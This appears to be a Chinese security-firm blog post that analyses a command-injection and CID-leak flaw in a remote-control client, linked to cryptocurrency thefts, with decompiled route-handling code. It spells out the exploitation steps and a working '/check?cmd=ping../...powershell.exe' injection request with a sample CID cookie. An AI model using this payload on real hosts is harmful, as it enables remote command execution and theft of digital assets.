起因

最近许多Web3的加密货币持有者，在使用某远程控制软件期间，发生多起加密货币丢失事件。下图为其中一起事件。

黑客钱包地址：

0xbb3fd383d1c5540e52ef0a7bcb9433375793aeaf

这不得不联想到去年某远程控制软件http服务爆过cid泄漏+命令注入漏洞CNVD-2022-10270/CNVD-2022-03672；受害者每次启动该软件时，会自动随机开启一个大于40000的端口号作为http服务，在/check路由中，当参数cmd的值以ping或者nslookup开头时可以执行任意命令，攻击者可以下发c2 agent长期潜伏在受害者系统中观察。

影响版本：

个人版 for Windows <= 11.0.0.33162

简约版 <= V1.0.1.43315

分析

看一下login.cgi

v5 =(__int64 (__fastcall *)())operatornew(0x50ui64); v55 = v5; v54 =15i64; v53 =0i64; v51[0]=0; sub_1400F0690(v51,"login.cgi",9ui64); v6 = sub_140E2D6BC(v5, v51); v57 =&off_1410D3B20; v58 =(char(__fastcall *)(__int64, __int64))sub_140E1EE50; v59 = v52; v60 = a1; v61 =&v57; v66 =(_QWORD *)v6; if( v6 ) { v7 = v6 +8+*(int*)(*(_QWORD *)(v6 +8)+4i64); (*(void(__fastcall **)(__int64))(*(_QWORD *)v7 +8i64))(v7); } sub_140E2D85C(a1 +55,&v66,&v57); LOBYTE(v8)=1; sub_1400EEDC0(v51, v8,0i64); v56 =&v57; v9 =(__int64 (__fastcall *)())operatornew(0x50ui64); v55 = v9; v54 =15i64; v53 =0i64; v51[0]=0; sub_1400F0690(v51,(void*)"cgi-bin/login.cgi",0x11ui64); v10 = sub_140E2D6BC(v9, v51); v57 =&off_1410D3B20; v58 =(char(__fastcall *)(__int64, __int64))sub_140E1EE50; v59 = v52; v60 = a1; v61 =&v57; v66 =(_QWORD *)v10; if( v10 ) { v11 = v10 +8+*(int*)(*(_QWORD *)(v10 +8)+4i64); (*(void(__fastcall **)(__int64))(*(_QWORD *)v11 +8i64))(v11); } sub_140E2D85C(a1 +55,&v66,&v57); LOBYTE(v12)=1; sub_1400EEDC0(v51, v12,0i64); v56 =&v57; v13 =(__int64 (__fastcall *)())operatornew(0x50ui64); v55 = v13; v54 =15i64; v53 =0i64; v51[0]=0; sub_1400F0690(v51,(void*)"cgi-bin/rpc",0xBui64); v14 = sub_140E2D6BC(v13, v51); v57 =&off_1410D3B20; v58 = sub_140E1C954; v59 = v52; v60 = a1; v61 =&v57; v66 =(_QWORD *)v14; if( v14 ) { v15 = v14 +8+*(int*)(*(_QWORD *)(v14 +8)+4i64); (*(void(__fastcall **)(__int64))(*(_QWORD *)v15 +8i64))(v15); }

定位到cgi-bin/rpc

获得以下路由

v63 =(*(__int64 (__fastcall **)(_QWORD))(**(_QWORD **)(a1 +8)+104i64))(*(_QWORD *)(a1 +8)); sub_140320D80( (int)&qword_1414049C0, 1, (int)"..\\includes\\libsunloginclient\\client\\HttpDecideClientType.cpp", (int)"CHttpDecideTcpClientType::DecideClient", 205, "[Acceptor][HTTP] new RC HTTP connection %s,%s, plugin:%s, session:%s", v63); if((unsignedint)sub_140101DB0(v116,"login") && strcmp(v61,"express_login") && strcmp(v61,"cgi-bin/login.cgi") && strcmp(v61,"log") && strcmp(v61,"cgi-bin/rpc") && strcmp(v61,"transfer") && strcmp(v61,"cloudconfig") && strcmp(v61,"getfastcode") && strcmp(v61,"assist") && strcmp(v61,"cloudconfig") && strcmp(v61,"projection") && strcmp(v61,"getaddress") && strcmp(v61,"sunlogin-tools")) ... sub_1400F05E0(v116); goto LABEL_168; } } if(!(unsignedint)sub_140101DB0(v116,"login") ||!(unsignedint)sub_140101DB0(v116,"control") ||!strcmp(v61,"express_login") ||!strcmp(v61,"cgi-bin/login.cgi") ||!strcmp(v61,"cgi-bin/rpc") ||!strcmp(v61,"desktop.list") ||!strcmp(v61,"cloudconfig") ||!strcmp(v61,"check") ||!strcmp(v61,"transfer") ||!strcmp(v61,"getfastcode") ||!strcmp(v61,"assist") ||!strcmp(v61,"micro-live/enable") ||!strcmp(v61,"projection") ||!strcmp(v61,"getaddress")) { v103 =*(_QWORD *)(a1 +8);

根据网上披露的漏洞信息，先从cgi-bin/rpc路由获取的身份验证CID，可以看到action参数进行区分功能。

当action为verify-haras时，返回verify_string。

if(!(unsignedint)sub_140101DB0(v131,"verify-haras")) { sub_1400F0690(Src,"{\"__code\":0,\"enabled\":\"1\",\"verify_string\":\"",0x2Bui64); LOBYTE(v22)=1; v23 =(*(__int64 (__fastcall **)(_QWORD,char*, __int64))(**(_QWORD **)(*(_QWORD *)(a1 +416)+288i64)+144i64))( *(_QWORD *)(*(_QWORD *)(a1 +416)+288i64), v125, v22); sub_1400EEE40(Src, v23,0i64,-1i64); sub_1400F05E0(v125); sub_1400EEC60(Src,"\",\"code\":0} ",0xCui64); v73 =1; CxxThrowException(&v73,(_ThrowInfo *)&stru_1412F7B30); }

当action为login-type时，返回受害者设备相关信息。

if(!(unsignedint)sub_140101DB0(v131,"login-type")) { sub_1405ACBA0(v93); v16 ="0"; if((*(unsigned __int8 (__fastcall **)(_QWORD))(**(_QWORD **)(*(_QWORD *)(a1 +416)+288i64)+112i64))(*(_QWORD *)(*(_QWORD *)(a1 +416)+288i64))) ... memset(Buffer,0,sizeof(Buffer)); sub_140150A60( Buffer, "{\"__code\":0,\"use_custom\":%d,\"code\":0,\"version\":\"%s\",\"isbinding\":%s,\"isinstalled\":%s,\"isprojection\"" ":%s,\"platform\":\"%s\",\"mac\":\"%s\",\"request_need_pwd\":\"%s\",\"accept_request\":\"1\",\"support_file\":\"1\"" ",\"disable_remote_bind\":\"%s\"} "); if( Buffer[0]) { do ++v6; while( Buffer[v6]); v4 = v6; } sub_1400F0690(Src, Buffer, v4); v72 =1; CxxThrowException(&v72,(_ThrowInfo *)&stru_1412F7B30); }

除了以上还有fast-loginbind-request

再来看check路由，攻击者可以通过ping或nslookup进行构造恶意命令实现远程命令执行

getaddress路由可以获取到映射在外网固定端口的https服务地址，那这个地址是可以被网络资产搜索引擎抓取或被攻击者扫描到，所以攻击路径不局限于内网。

利用过程

每次启动时，会在40000+随机一个rpc接口的端口

第一步，获取受害者的CID。

第二步，添加CID进行身份认证Cookie:CID=Pvqsv5f5QDs8vYotYsUEFvTkqJuKeZIS并在受害者电脑执行任意命令。

查看受害者的系统文件

check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+dir+c:/

总结：

随着web3的持续发展，由于web3基础架构的隐匿性以及数字资产的高价值，黑客由传统的网络安全盗取数据转变在web3的生态里，盗取用户数字资产。很多黑客开始利用0day/1day来完成攻击目标设施，包括服务器，个人主机，钱包APP，移动客户端等，通过入侵这些系统，最终窃取用户的数字资产的目的，这里建议用户需要及时给系统打补丁，及时更新系统内的软件，不点击不明来源的连接，做好系统隔离，密钥需要在隔离系统中存放以及使用，不随便装不明来源的软件等。Numen 提供溯源，威胁情报，追币等服务，我们有行业顶级web3安全专家以及全球顶级的传统网络安全专家，持续研究，跟踪web3安全领域的问题，为您的数字资产安全保驾护航。